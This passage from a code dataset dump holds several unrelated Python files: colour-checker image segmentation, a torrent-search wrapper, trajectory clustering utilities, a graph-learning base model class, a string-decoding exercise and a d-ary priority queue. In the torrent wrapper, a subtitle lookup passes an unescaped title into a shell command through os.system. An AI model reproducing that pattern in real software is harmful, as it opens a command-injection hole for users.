0.43479153 0.38657128]]\n \n [[ 0.97268436 0.77938292 0.04416006]\n [ 0.71481599 0.19768507 0.95665297]]\n \n [[ 0.69772882 0.86299324 0.43614665]\n [ 0.2160895 0.98340068 0.94897731]]\n \n [[ 0.97627445 0.16384224 0.78630599]\n [ 0.00623026 0.59733394 0.8662893 ]]]\n >>> image = as_8_bit_BGR_image(image)\n >>> print(image)\n [[[ 23 137 251]\n [167 176 195]]\n \n [[ 59 228 251]\n [250 122 219]]\n \n [[176 238 217]\n [249 253 128]]\n \n [[229 112 252]\n [239 203 18]]]\n >>> 
as_8_bit_BGR_image(image)\n array([[[ 23, 137, 251],\n [167, 176, 195]],\n \n [[ 59, 228, 251],\n [250, 122, 219]],\n \n [[176, 238, 217],\n [249, 253, 128]],\n \n [[229, 112, 252],\n [239, 203, 18]]], dtype=uint8)\n \"\"\"\n\n image = np.asarray(image)\n\n if image.dtype == np.uint8:\n return image\n\n return cv2.cvtColor((cctf_encoding(image) * 255).astype(np.uint8),\n cv2.COLOR_RGB2BGR)\n\n\ndef adjust_image(image, target_width=WORKING_WIDTH):\n \"\"\"\n Adjusts given image so that it is horizontal and resizes it to given target\n width.\n\n Parameters\n ----------\n image : array_like\n Image to adjust.\n target_width : int, optional\n Width the image is resized to.\n\n Returns\n -------\n ndarray\n Resized image.\n\n Examples\n --------\n >>> from colour.algebra import random_triplet_generator\n >>> prng = np.random.RandomState(4)\n >>> image = list(random_triplet_generator(8, random_state=prng))\n >>> image = np.reshape(image, [2, 4, 3])\n >>> adjust_image(image, 5) # doctest: +ELLIPSIS\n array([[[ 0.9925326..., 0.2419374..., -0.0139522...],\n [ 0.6174496..., 0.3460755..., 0.3189758...],\n [ 0.7447774..., 0.6786660..., 0.1652180...],\n [ 0.9476451..., 0.6550805..., 0.2609945...],\n [ 0.6991505..., 0.1623470..., 1.0120867...]],\n \n [[ 0.7269885..., 0.8556784..., 0.4049920...],\n [ 0.2666564..., 1.0401633..., 0.8238320...],\n [ 0.6419699..., 0.5442698..., 0.9082210...],\n [ 0.7894426..., 0.1944301..., 0.7906868...],\n [-0.0526997..., 0.6236684..., 0.8711482...]]])\n \"\"\"\n\n width, height = image.shape[1], image.shape[0]\n if width < height:\n image = cv2.rotate(image, cv2.ROTATE_90_CLOCKWISE)\n height, width = width, height\n\n ratio = width / target_width\n\n if np.allclose(ratio, 1):\n return image\n else:\n return cv2.resize(\n image, (as_int(target_width), as_int(height / ratio)),\n interpolation=cv2.INTER_CUBIC)\n\n\ndef is_square(contour, tolerance=0.015):\n \"\"\"\n Returns if given contour is a square.\n\n Parameters\n ----------\n contour : array_like\n Shape to test whether it is a square.\n tolerance : numeric, optional\n Tolerance under which the contour is considered to be a square.\n\n Returns\n -------\n bool\n Whether given contour is a square.\n\n Examples\n --------\n >>> shape = np.array([[0, 0], [1, 0], [1, 1], [0, 1]])\n >>> is_square(shape)\n True\n >>> shape = np.array([[0.5, 0], [1, 0], [1, 1], [0, 1]])\n >>> is_square(shape)\n False\n \"\"\"\n\n return cv2.matchShapes(contour, np.array([[0, 0], [1, 0], [1, 1], [0, 1]]),\n cv2.CONTOURS_MATCH_I2, 0.0) < tolerance\n\n\ndef contour_centroid(contour):\n \"\"\"\n Returns the centroid of given contour.\n\n Parameters\n ----------\n contour : array_like\n Contour to return the centroid of.\n\n Returns\n -------\n tuple\n Contour centroid.\n\n Notes\n -----\n - A :class:`tuple` class is returned instead of a :class:`ndarray` class\n for convenience with *OpenCV*.\n\n Examples\n --------\n >>> contour = np.array([[0, 0], [1, 0], [1, 1], [0, 1]])\n >>> contour_centroid(contour)\n (0.5, 0.5)\n \"\"\"\n\n moments = cv2.moments(contour)\n centroid = np.array(\n [moments['m10'] / moments['m00'], moments['m01'] / moments['m00']])\n\n return centroid[0], centroid[1]\n\n\ndef scale_contour(contour, factor):\n \"\"\"\n Scales given contour by given scale factor.\n\n Parameters\n ----------\n contour : array_like\n Contour to scale.\n factor : numeric\n Scale factor.\n\n Returns\n -------\n ndarray\n Scaled contour.\n\n Examples\n --------\n >>> contour = np.array([[0, 0], [1, 0], [1, 1], [0, 1]])\n >>> scale_contour(contour, 
2)\n array([[ 0., 0.],\n [ 2., 0.],\n [ 2., 2.],\n [ 0., 2.]])\n \"\"\"\n\n centroid = as_int_array(contour_centroid(contour))\n scaled_contour = (as_float_array(contour) - centroid) * factor + centroid\n\n return scaled_contour\n\n\ndef crop_and_level_image_with_rectangle(image, rectangle):\n \"\"\"\n Crops and rotates/levels given image using given rectangle.\n\n Parameters\n ----------\n image : array_like\n Image to crop and rotate/level.\n rectangle : tuple\n Rectangle used to crop and rotate/level the image.\n\n Returns\n -------\n ndarray\n Cropped and rotated/levelled image.\n\n References\n ----------\n :cite:`Abecassis2011`\n\n Notes\n -----\n - ``image`` is expected to be an unsigned 8-bit sRGB encoded image.\n\n Examples\n --------\n >>> import os\n >>> from colour import read_image\n >>> from colour_checker_detection import TESTS_RESOURCES_DIRECTORY\n >>> path = os.path.join(TESTS_RESOURCES_DIRECTORY,\n ... 'colour_checker_detection', 'detection',\n ... 'IMG_1967.png')\n >>> image = as_8_bit_BGR_image(adjust_image(read_image(path)))\n >>> rectangle = (\n ... (723.29608154, 465.50939941),\n ... (461.24377441, 696.34759522),\n ... -88.18692780,\n ... )\n >>> print(image.shape)\n (958, 1440, 3)\n >>> image = crop_and_level_image_with_rectangle(image, rectangle)\n >>> print(image.shape)\n (461, 696, 3)\n \"\"\"\n\n width, height = image.shape[1], image.shape[0]\n width_r, height_r = rectangle[1]\n centroid = as_int_array(contour_centroid(cv2.boxPoints(rectangle)))\n centroid = centroid[0], centroid[1]\n angle = rectangle[-1]\n\n if angle < -45:\n angle += 90\n width_r, height_r = height_r, width_r\n\n width_r, height_r = as_int_array([width_r, height_r])\n\n M_r = cv2.getRotationMatrix2D(centroid, angle, 1)\n\n image_r = cv2.warpAffine(image, M_r, (width, height), cv2.INTER_CUBIC)\n image_c = cv2.getRectSubPix(image_r, (width_r, height_r),\n (centroid[0], centroid[1]))\n\n return image_c\n\n\ndef colour_checkers_coordinates_segmentation(image, additional_data=False):\n \"\"\"\n Detects the colour checkers coordinates in given image :math:`image` using\n segmentation.\n\n This is the core detection definition. The process is as follows:\n\n - Input image :math:`image` is converted to a grayscale image\n :math:`image_g`.\n - Image :math:`image_g` is denoised.\n - Image :math:`image_g` is thresholded/segmented to image\n :math:`image_s`.\n - Image :math:`image_s` is eroded and dilated to cleanup remaining noise.\n - Contours are detected on image :math:`image_s`.\n - Contours are filtered to only keep squares/swatches above and below\n defined surface area.\n - Squares/swatches are clustered to isolate regions-of-interest that are\n potentially colour checkers: Contours are scaled by a third so that\n colour checkers swatches are expected to be joined, creating a large\n rectangular cluster. 
Rectangles are fitted to the clusters.\n - Clusters with an aspect ratio different to the expected one are\n rejected, a side-effect is that the complementary pane of the\n *X-Rite* *ColorChecker Passport* is omitted.\n - Clusters with a number of swatches close to :attr:`SWATCHES` are\n kept.\n\n Parameters\n ----------\n image : array_like\n Image to detect the colour checkers in.\n additional_data : bool, optional\n Whether to output additional data.\n\n Returns\n -------\n list or ColourCheckersDetectionData\n List of colour checkers coordinates or\n :class:`ColourCheckersDetectionData` class instance with additional\n data.\n\n Notes\n -----\n - Multiple colour checkers can be detected if presented in ``image``.\n\n Examples\n --------\n >>> import os\n >>> from colour import read_image\n >>> from colour_checker_detection import TESTS_RESOURCES_DIRECTORY\n >>> path = os.path.join(TESTS_RESOURCES_DIRECTORY,\n ... 'colour_checker_detection', 'detection',\n ... 'IMG_1967.png')\n >>> image = read_image(path)\n >>> colour_checkers_coordinates_segmentation(image) # doctest: +ELLIPSIS\n [array([[1065, 707],\n [ 369, 688],\n [ 382, 226],\n [1078, 246]]...)]\n \"\"\"\n\n image = as_8_bit_BGR_image(adjust_image(image, WORKING_WIDTH))\n\n width, height = image.shape[1], image.shape[0]\n maximum_area = width * height / SWATCHES\n minimum_area = width * height / SWATCHES / SWATCH_MINIMUM_AREA_FACTOR\n\n block_size = as_int(WORKING_WIDTH * 0.015)\n block_size = block_size - block_size % 2 + 1\n\n # Thresholding/Segmentation.\n image_g = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n image_g = cv2.fastNlMeansDenoising(image_g, None, 10, 7, 21)\n image_s = cv2.adaptiveThreshold(image_g, 255, cv2.ADAPTIVE_THRESH_MEAN_C,\n cv2.THRESH_BINARY, block_size, 3)\n # Cleanup.\n kernel = np.ones((3, 3), np.uint8)\n image_c = cv2.erode(image_s, kernel, iterations=1)\n image_c = cv2.dilate(image_c, kernel, iterations=1)\n\n # Detecting contours.\n contours, _hierarchy = cv2.findContours(image_c, cv2.RETR_TREE,\n cv2.CHAIN_APPROX_NONE)\n\n # Filtering squares/swatches contours.\n swatches = []\n for contour in contours:\n curve = cv2.approxPolyDP(contour, 0.01 * cv2.arcLength(contour, True),\n True)\n if minimum_area < cv2.contourArea(curve) < maximum_area and is_square(\n curve):\n swatches.append(\n as_int_array(cv2.boxPoints(cv2.minAreaRect(curve))))\n\n # Clustering squares/swatches.\n clusters = np.zeros(image.shape, dtype=np.uint8)\n for swatch in [\n as_int_array(scale_contour(swatch, 1 + 1 / 3))\n for swatch in swatches\n ]:\n cv2.drawContours(clusters, [swatch], -1, [255] * 3, -1)\n clusters = cv2.cvtColor(clusters, cv2.COLOR_RGB2GRAY)\n clusters, _hierarchy = cv2.findContours(clusters, cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_NONE)\n clusters = [\n as_int_array(\n scale_contour(cv2.boxPoints(cv2.minAreaRect(cluster)), 0.975))\n for cluster in clusters\n ]\n\n # Filtering clusters using their aspect ratio.\n filtered_clusters = []\n for cluster in clusters[:]:\n rectangle = cv2.minAreaRect(cluster)\n width = max(rectangle[1][0], rectangle[1][1])\n height = min(rectangle[1][0], rectangle[1][1])\n ratio = width / height\n if ASPECT_RATIO * 0.9 < ratio < ASPECT_RATIO * 1.1:\n filtered_clusters.append(cluster)\n clusters = filtered_clusters\n\n # Filtering swatches within cluster.\n counts = []\n for cluster in clusters:\n count = 0\n for swatch in swatches:\n if cv2.pointPolygonTest(cluster, contour_centroid(swatch),\n False) == 1:\n count += 1\n counts.append(count)\n counts = np.array(counts)\n indexes = 
np.where(\n np.logical_and(counts >= SWATCHES * 0.75,\n counts <= SWATCHES * 1.25))[0].tolist()\n\n colour_checkers = [clusters[i] for i in indexes]\n\n if additional_data:\n return ColourCheckersDetectionData(colour_checkers, clusters, swatches,\n image_c)\n else:\n return colour_checkers\n\n\ndef extract_colour_checkers_segmentation(image):\n \"\"\"\n Extracts the colour checkers sub-images in given image using segmentation.\n\n Parameters\n ----------\n image : array_like\n Image to extract the colour checkers sub-images from.\n\n Returns\n -------\n list\n List of colour checkers sub-images.\n\n Examples\n --------\n >>> import os\n >>> from colour import read_image\n >>> from colour_checker_detection import TESTS_RESOURCES_DIRECTORY\n >>> path = os.path.join(TESTS_RESOURCES_DIRECTORY,\n ... 'colour_checker_detection', 'detection',\n ... 'IMG_1967.png')\n >>> image = read_image(path)\n >>> extract_colour_checkers_segmentation(image)\n ... # doctest: +SKIP\n [array([[[ 86, 104, 113],\n [ 89, 102, 118],\n [ 88, 101, 117],\n ...,\n [ 79, 101, 114],\n [ 76, 101, 114],\n [ 79, 98, 110]],\n \n [[ 84, 104, 112],\n [ 85, 102, 115],\n [ 84, 101, 115],\n ...,\n [ 80, 101, 110],\n [ 79, 101, 112],\n [ 78, 98, 112]],\n \n [[ 84, 102, 112],\n [ 82, 102, 112],\n [ 82, 101, 113],\n ...,\n [ 81, 100, 109],\n [ 80, 100, 110],\n [ 79, 100, 113]],\n \n ...,\n [[ 89, 105, 117],\n [ 90, 106, 120],\n [ 86, 106, 117],\n ...,\n [ 84, 100, 109],\n [ 83, 100, 111],\n [ 80, 100, 114]],\n \n [[ 89, 106, 116],\n [ 91, 107, 121],\n [ 89, 106, 119],\n ...,\n [ 81, 99, 113],\n [ 79, 100, 115],\n [ 75, 100, 114]],\n \n [[ 84, 108, 117],\n [ 89, 108, 117],\n [ 91, 107, 117],\n ...,\n [ 79, 98, 117],\n [ 77, 100, 117],\n [ 73, 101, 116]]], dtype=uint8)]\n \"\"\"\n\n image = as_8_bit_BGR_image(adjust_image(image, WORKING_WIDTH))\n\n colour_checkers = []\n for colour_checker in colour_checkers_coordinates_segmentation(image):\n colour_checker = crop_and_level_image_with_rectangle(\n image, cv2.minAreaRect(colour_checker))\n width, height = (colour_checker.shape[1], colour_checker.shape[0])\n\n if width < height:\n colour_checker = cv2.rotate(colour_checker,\n cv2.ROTATE_90_CLOCKWISE)\n\n colour_checkers.append(colour_checker)\n\n return colour_checkers\n\n\ndef detect_colour_checkers_segmentation(image,\n samples=16,\n additional_data=False):\n \"\"\"\n Detects the colour checkers swatches in given image using segmentation.\n\n Parameters\n ----------\n image : array_like\n Image to detect the colour checkers swatches in.\n samples : int\n Samples count to use to compute the swatches colours. The effective\n samples count is :math:`samples^2`.\n additional_data : bool, optional\n Whether to output additional data.\n\n Returns\n -------\n list\n List of colour checkers swatches or :class:`ColourCheckerSwatchesData`\n class instances.\n\n Examples\n --------\n >>> import os\n >>> from colour import read_image\n >>> from colour_checker_detection import TESTS_RESOURCES_DIRECTORY\n >>> path = os.path.join(TESTS_RESOURCES_DIRECTORY,\n ... 'colour_checker_detection', 'detection',\n ... 
'IMG_1967.png')\n >>> image = read_image(path)\n >>> detect_colour_checkers_segmentation(image) # doctest: +ELLIPSIS\n [array([[ 0.3594894..., 0.2225419..., 0.1176996...],\n [ 0.6250058..., 0.3931947..., 0.2417636...],\n [ 0.3304194..., 0.3142103..., 0.2874383...],\n [ 0.3034269..., 0.2721812..., 0.1053537...],\n [ 0.4153488..., 0.3183605..., 0.3067842...],\n [ 0.3458465..., 0.4393400..., 0.2912665...],\n [ 0.6782215..., 0.3519573..., 0.0752686...],\n [ 0.2715231..., 0.2515535..., 0.3295411...],\n [ 0.6171124..., 0.2687208..., 0.1852935...],\n [ 0.3049796..., 0.1792275..., 0.1908085...],\n [ 0.4844366..., 0.4576518..., 0.0392559...],\n [ 0.6494152..., 0.3991223..., 0.0329260...],\n [ 0.1922949..., 0.1842026..., 0.2731065...],\n [ 0.2780555..., 0.3836590..., 0.1233134...],\n [ 0.5515815..., 0.2126631..., 0.1250530...],\n [ 0.7178619..., 0.5132913..., 0.0804213...],\n [ 0.5753956..., 0.2563947..., 0.2672106...],\n [ 0.1799058..., 0.3160584..., 0.2945296...],\n [ 0.7402078..., 0.6088296..., 0.4374975...],\n [ 0.6272391..., 0.5156084..., 0.3713541...],\n [ 0.5120363..., 0.4196305..., 0.2976295...],\n [ 0.3690167..., 0.3019190..., 0.2083050...],\n [ 0.2624792..., 0.2143349..., 0.1428991...],\n [ 0.1625438..., 0.1333312..., 0.0807412...]])]\n \"\"\"\n\n image = adjust_image(image, WORKING_WIDTH)\n\n swatches_h, swatches_v = SWATCHES_HORIZONTAL, SWATCHES_VERTICAL\n\n colour_checkers_colours = []\n colour_checkers_data = []\n for colour_checker in extract_colour_checkers_segmentation(image):\n colour_checker = cctf_decoding(\n as_float_array(colour_checker[..., ::-1]) / 255)\n width, height = (colour_checker.shape[1], colour_checker.shape[0])\n masks = swatch_masks(width, height, swatches_h, swatches_v, samples)\n\n swatch_colours = []\n for i, mask in enumerate(masks):\n swatch_colours.append(\n np.mean(\n colour_checker[mask[0]:mask[1], mask[2]:mask[3], ...],\n axis=(0, 1)))\n\n # Colour checker could be in reverse order.\n swatch_neutral_colours = swatch_colours[18:23]\n is_reversed = False\n for i, swatch, in enumerate(swatch_neutral_colours[:-1]):\n if np.mean(swatch) < np.mean(swatch_neutral_colours[i + 1]):\n is_reversed = True\n break\n\n if is_reversed:\n swatch_colours = swatch_colours[::-1]\n\n swatch_colours = np.asarray(swatch_colours)\n\n colour_checkers_colours.append(swatch_colours)\n colour_checkers_data.append((colour_checker, masks))\n\n if additional_data:\n return [\n ColourCheckerSwatchesData(colour_checkers_colours[i],\n *colour_checkers_data[i])\n for i, colour_checker_colours in enumerate(colour_checkers_colours)\n ]\n else:\n return colour_checkers_colours\n","sub_path":"colour_checker_detection/detection/segmentation.py","file_name":"segmentation.py","file_ext":"py","file_size_in_byte":24710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"220461928","text":"from .extractors import eztv, yts\nimport os\nfrom halo import Halo\n\n\nclass Ezflix(object):\n def __init__(self,\n query,\n media_type='tv',\n limit=20,\n sort_by='seeds',\n sort_order='desc',\n quality=None,\n minimum_rating=None,\n language='en'\n ):\n self._torrents = []\n self._query = query\n self._media_type = media_type\n self._limit = limit\n self._sort_by = sort_by\n self._sort_order = sort_order\n self._quality = quality\n self._minimum_rating = minimum_rating\n self._language = language\n\n def get_magnet(self, val):\n for result in self._torrents:\n if result['id'] == int(val):\n return result\n return None\n\n def find_subtitles(self, title):\n 
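\"\"\"Shell out to subliminal to download a subtitle for the given title in self._language,\n then return the first filename in the current working directory containing the title,\n or None if no match is found.\n \"\"\"\n 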
os.system(\"subliminal download -l %s '%s'\" % (self._language, title))\n cur_dir = os.getcwd()\n file_list = os.listdir(cur_dir)\n for f in file_list:\n if title in f:\n return f\n\n return None\n\n def get_torrents(self):\n spinner = Halo(text='Searching...', spinner='dots')\n spinner.start()\n if self._media_type == 'tv':\n self._torrents = eztv(self._query.replace(' ', '-').lower(), limit=self._limit, quality=self._quality)\n\n elif self._media_type == 'movie':\n self._torrents = yts(query_term=self._query,\n limit=self._limit,\n sort_by=self._sort_by,\n sort_order=self._sort_order,\n quality=self._quality,\n minimum_rating=self._minimum_rating\n )\n spinner.stop()\n spinner.clear()\n return self._torrents\n","sub_path":"ezflix/ezflix.py","file_name":"ezflix.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"445927841","text":"import math\n\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\nfrom traffic.core import Traffic\n\nfrom .clustering import DCEC\n\n\ndef input_shape(nb_samples, nb_features):\n height = [\n d for d in range(2, int(math.sqrt(nb_samples)) + 1) if nb_samples % d == 0\n ][-1]\n width = nb_samples // height\n return (width, height, nb_features)\n\n\ndef input_shape1d(nb_samples, nb_features):\n return (1, nb_samples, nb_features)\n\ndef input_shape_local1d(nb_samples, nb_features):\n return (1,nb_samples, nb_features)\n\ndef input_shape_dense(nb_samples, nb_features):\n return (nb_samples* nb_features,)\n\n\ndef pretrained_clust(\n traffic_file, list_features, filters, n_clusters, pretrained_path, to_pickle,\n):\n t = Traffic.from_file(traffic_file)\n nb_samples = len(t[0])\n nb_features = len(list_features)\n\n dcec = DCEC(\n input_shape=input_shape(nb_samples, nb_features),\n filters=filters,\n n_clusters=n_clusters,\n )\n dcec.load_weights(pretrained_path)\n\n t_c = t.clustering(\n nb_samples=None,\n features=list_features,\n clustering=dcec,\n transform=MinMaxScaler(feature_range=(-1, 1)),\n ).predict()\n\n re = dcec.score_samples(dcec.X)\n re = MinMaxScaler(feature_range=(0, 1)).fit_transform(re.reshape(-1, 1)).flatten()\n t_c_re = pd.DataFrame.from_records(\n [dict(flight_id=f.flight_id, re=re) for f, re in zip(t_c, re)]\n )\n t_c_re = t_c.merge(t_c_re, on=\"flight_id\")\n\n t_c_re.to_pickle(to_pickle)\n print(\n t_c_re.groupby([\"cluster\"]).agg(\n {\"flight_id\": \"nunique\", \"re\": [\"mean\", \"min\", \"max\"]}\n )\n )\n return dcec, t_c_re\n","sub_path":"dcec/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"503283832","text":"import os\r\nimport random\r\nimport logging\r\nimport torch\r\n\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport os.path as osp\r\nimport scipy.sparse as sp\r\n\r\nfrom tensorflow.keras import backend as K\r\n\r\nfrom abc import ABC\r\n\r\nfrom graphgallery import intx, floatx, backend, set_backend, is_list_like\r\nfrom graphgallery.data.io import makedirs_from_path\r\nfrom graphgallery.data import Basegraph, Graph\r\nfrom graphgallery.utils.raise_error import raise_if_kwargs\r\nfrom graphgallery.utils import save\r\n\r\n\r\ndef _check_cur_module(module, kind):\r\n modules = module.split('.')[-4:]\r\n if any((\"TF\" in modules and kind == \"P\",\r\n \"PTH\" in modules and kind == \"T\")):\r\n cur_module = \"Tensorflow models\" if kind == \"P\" else \"PyTorch models\"\r\n raise 
RuntimeError(f\"You are currently using models in '{cur_module}' but with backend '{backend()}'. \"\r\n \"Please use `set_backend()` to change the current backend.\")\r\n\r\n\r\ndef parse_graph_inputs(*graph):\r\n # TODO: Maybe I could write it a little more elegantly here?\r\n if len(graph) == 0:\r\n graph = None\r\n elif len(graph) == 1:\r\n graph, = graph\r\n if isinstance(graph, Basegraph):\r\n ...\r\n elif sp.isspmatrix(graph):\r\n graph = Graph(graph)\r\n elif isinstance(graph, dict):\r\n return Graph(**graph)\r\n elif is_list_like(graph):\r\n # TODO: multi graph\r\n ...\r\n else:\r\n raise ValueError(f\"Unrecognized inputs {graph}.\")\r\n else:\r\n if sp.isspmatrix(graph[0]):\r\n graph = Graph(*graph)\r\n elif is_list_like(graph[0]):\r\n # TODO: multi graph\r\n ...\r\n else:\r\n raise ValueError(f\"Unrecognized inputs {graph}.\")\r\n\r\n return graph\r\n\r\n\r\ndef parse_device(device: str, kind: str) -> str:\r\n # TODO:\r\n # 1. device can be torch.device\r\n # 2. check if gpu is available\r\n _device = osp.split(device.lower())[1]\r\n if not any((_device.startswith(\"cpu\"),\r\n _device.startswith(\"cuda\"),\r\n _device.startswith(\"gpu\"))):\r\n raise RuntimeError(\r\n f\"Expected one of cpu (CPU), cuda (CUDA), gpu (GPU) device type at start of device string: {device}\")\r\n\r\n if _device.startswith(\"cuda\"):\r\n if kind == \"T\":\r\n _device = \"GPU\" + _device[4:]\r\n elif _device.startswith(\"gpu\"):\r\n if kind == \"P\":\r\n _device = \"cuda\" + _device[3:]\r\n\r\n if kind == \"P\":\r\n if _device.startswith('cuda'):\r\n torch.cuda.empty_cache()\r\n return torch.device(_device)\r\n return _device\r\n\r\n
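# Examples derived from the branches above: parse_device(\"gpu:0\", \"P\") -> torch.device(\"cuda:0\");\r\n# parse_device(\"cuda:1\", \"T\") -> \"GPU:1\"; parse_device(\"cpu:0\", \"T\") -> \"cpu:0\".\r\n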
\r\nclass BaseModel(ABC):\r\n \"\"\"Base model for semi-supervised learning and unsupervised learning.\"\"\"\r\n\r\n def __init__(self, *graph, device=\"cpu:0\", seed=None, name=None, **kwargs):\r\n \"\"\"Create a base model for semi-supervised learning and unsupervised learning.\r\n\r\n Parameters:\r\n ----------\r\n graph: Graph or MultiGraph.\r\n device: string. optional\r\n The device where the model runs on.\r\n seed: integer scalar. optional\r\n Used in combination with `tf.random.set_seed` & `np.random.seed`\r\n & `random.seed` to create a reproducible sequence of tensors\r\n across multiple calls.\r\n name: string. optional\r\n Specified name for the model. (default: :str: `class.__name__`)\r\n kwargs: other custom keyword parameters.\r\n\r\n \"\"\"\r\n graph = parse_graph_inputs(*graph)\r\n self.backend = backend()\r\n self.kind = self.backend.kind\r\n\r\n if kwargs.pop('check', True):\r\n _check_cur_module(self.__module__, self.kind)\r\n\r\n _id = np.random.RandomState(None).randint(100)\r\n\r\n raise_if_kwargs(kwargs)\r\n\r\n if seed is not None:\r\n np.random.seed(seed)\r\n random.seed(seed)\r\n if self.kind == \"P\":\r\n torch.manual_seed(seed)\r\n torch.cuda.manual_seed(seed)\r\n# torch.cuda.manual_seed_all(seed)\r\n else:\r\n tf.random.set_seed(seed)\r\n\r\n if name is None:\r\n name = self.__class__.__name__\r\n\r\n self.graph = graph.copy()\r\n self.seed = seed\r\n self.name = name\r\n self.device = parse_device(device, self.kind)\r\n self.idx_train = None\r\n self.idx_val = None\r\n self.idx_test = None\r\n self.backup = None\r\n\r\n self._model = None\r\n self._custom_objects = None # used for save/load TF model\r\n\r\n # log path\r\n # add random integer to avoid duplication\r\n self.weight_path = osp.join(osp.expanduser(osp.normpath(\"/tmp/weight\")),\r\n f\"{name}_{_id}_weights\")\r\n\r\n # data types, default: `float32` and `int32`\r\n self.floatx = floatx()\r\n self.intx = intx()\r\n\r\n def save(self, path=None, as_model=False, overwrite=True, save_format=None, **kwargs):\r\n\r\n if not path:\r\n path = self.weight_path\r\n\r\n makedirs_from_path(path)\r\n\r\n if as_model:\r\n if self.kind == \"T\":\r\n save.save_tf_model(self.model, path, overwrite=overwrite, save_format=save_format, **kwargs)\r\n else:\r\n save.save_torch_model(self.model, path, overwrite=overwrite, save_format=save_format, **kwargs)\r\n else:\r\n if self.kind == \"T\":\r\n save.save_tf_weights(self.model, path, overwrite=overwrite, save_format=save_format)\r\n else:\r\n save.save_torch_weights(self.model, path, overwrite=overwrite, save_format=save_format)\r\n\r\n def load(self, path=None, as_model=False):\r\n if not path:\r\n path = self.weight_path\r\n\r\n if as_model:\r\n if self.kind == \"T\":\r\n self.model = save.load_tf_model(\r\n path, custom_objects=self.custom_objects)\r\n else:\r\n self.model = save.load_torch_model(path)\r\n else:\r\n if self.kind == \"T\":\r\n save.load_tf_weights(self.model, path)\r\n else:\r\n save.load_torch_weights(self.model, path)\r\n\r\n def __getattr__(self, attr):\r\n ##### TODO: This may cause ERROR ######\r\n try:\r\n return self.__dict__[attr]\r\n except KeyError:\r\n if hasattr(self, \"_model\") and hasattr(self._model, attr):\r\n return getattr(self._model, attr)\r\n raise AttributeError(\r\n f\"'{self.name}' and '{self.name}.model' objects have no attribute '{attr}'\")\r\n\r\n @property\r\n def model(self):\r\n return self._model\r\n\r\n @model.setter\r\n def model(self, m):\r\n # Back up\r\n if isinstance(m, tf.keras.Model) and m.weights:\r\n self.backup = tf.identity_n(m.weights)\r\n # assert m is None or isinstance(m, tf.keras.Model) or torch.nn.Module\r\n self._model = m\r\n\r\n @property\r\n def custom_objects(self):\r\n return self._custom_objects\r\n\r\n @custom_objects.setter\r\n def custom_objects(self, value):\r\n assert isinstance(value, dict)\r\n self._custom_objects = value\r\n\r\n @property\r\n def close(self):\r\n \"\"\"Close the Keras session and drop the model instance.\"\"\"\r\n K.clear_session()\r\n self.model = None\r\n\r\n def __call__(self, *args, **kwargs):\r\n return self._model(*args, **kwargs)\r\n\r\n def __repr__(self):\r\n return f\"GraphGallery.nn.{self.name}(device={self.device}, 
backend={self.backend})\"\r\n","sub_path":"graphgallery/nn/models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":7585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"458043459","text":"class Solution(object):\r\n def decodeString(self, s):\r\n \"\"\"\r\n :type s: str\r\n :rtype: str\r\n \"\"\"\r\n ans = []\r\n stack = [[\"\",1]]\r\n num = \"\"\r\n \r\n for char in s:\r\n if char.isdigit():\r\n num += char\r\n elif char == \"[\":\r\n stack.append([\"\",int(num)])\r\n num = \"\"\r\n elif char == \"]\":\r\n string,k = stack.pop()\r\n stack[-1][0] += string*k\r\n elif char.isalpha():\r\n stack[-1][0] += char\r\n \r\n #print(stack)\r\n return stack[0][0]\r\n\r\nif __name__ == '__main__':\r\n test = Solution()\r\n print(test.decodeString(\"32[a53[beg]]3[ag]\"))\r\n","sub_path":"decodeString.py","file_name":"decodeString.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"651811469","text":"class ipq:\n def __init__(self, d):\n self.tree = []\n self.d = d\n self.prt = []\n self.pos = []\n\n def get_size(self):\n return len(self.tree)\n\n def insert(self, key, p):\n self.tree.append(key)\n if len(self.pos) > key:\n self.pos[key] = self.get_size() - 1\n else:\n while len(self.pos) < key:\n self.pos.append(None)\n self.pos.append(self.get_size()-1)\n if len(self.prt) > key:\n self.prt[key] = p\n else:\n while len(self.prt) < key:\n self.prt.append(None)\n self.prt.append(p)\n self.bubbleup(self.get_size()-1)\n\n def bubbleup(self, i):\n if i <= 0:\n return\n p = (i-1)//self.d\n if self.prt[self.tree[p]] > self.prt[self.tree[i]]:\n self.swap(i, p)\n self.bubbleup(p)\n\n def swap(self, i, j):\n self.tree[i], self.tree[j] = self.tree[j], self.tree[i]\n self.pos[self.tree[i]], self.pos[self.tree[j]] = self.pos[self.tree[j]], self.pos[self.tree[i]]\n\n def poll(self):\n if self.get_size() == 0:\n return None\n if self.get_size() == 1:\n return self.tree.pop()\n z = self.tree[0]\n self.tree[0] = self.tree.pop()\n self.pos[self.tree[0]] = 0\n self.bubbledown(0)\n return z\n\n def bubbledown(self, i):\n minimum = i\n for j in range(self.d):\n child = i*self.d + j + 1\n if child < self.get_size() and self.prt[self.tree[child]] < self.prt[self.tree[minimum]]:\n minimum = child\n if i != minimum:\n self.swap(i, minimum)\n self.bubbledown(minimum)\n\n def decreasepri(self, key, np):\n if len(self.prt) <= key or self.prt[key] < np:\n return\n self.prt[key] = np\n self.bubbleup(self.pos[key])\n","sub_path":"algorithms and ds/graph_algorithms/indexed_d_ary_priority_q.py","file_name":"indexed_d_ary_priority_q.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"340225307","text":"import cadquery as cq\nimport cadquery.plugins.cq_driveline.cq_gears as cq_gears\n\n\n# Create a gear by specifying gear parameters\n# Must specify: teeth, module and faceWidth\n# Other parameters are optional\n# Note - this does not create any geometry\nGearA = cq_gears.cylindricalGear(\n teeth=29,\n module=1.5,\n 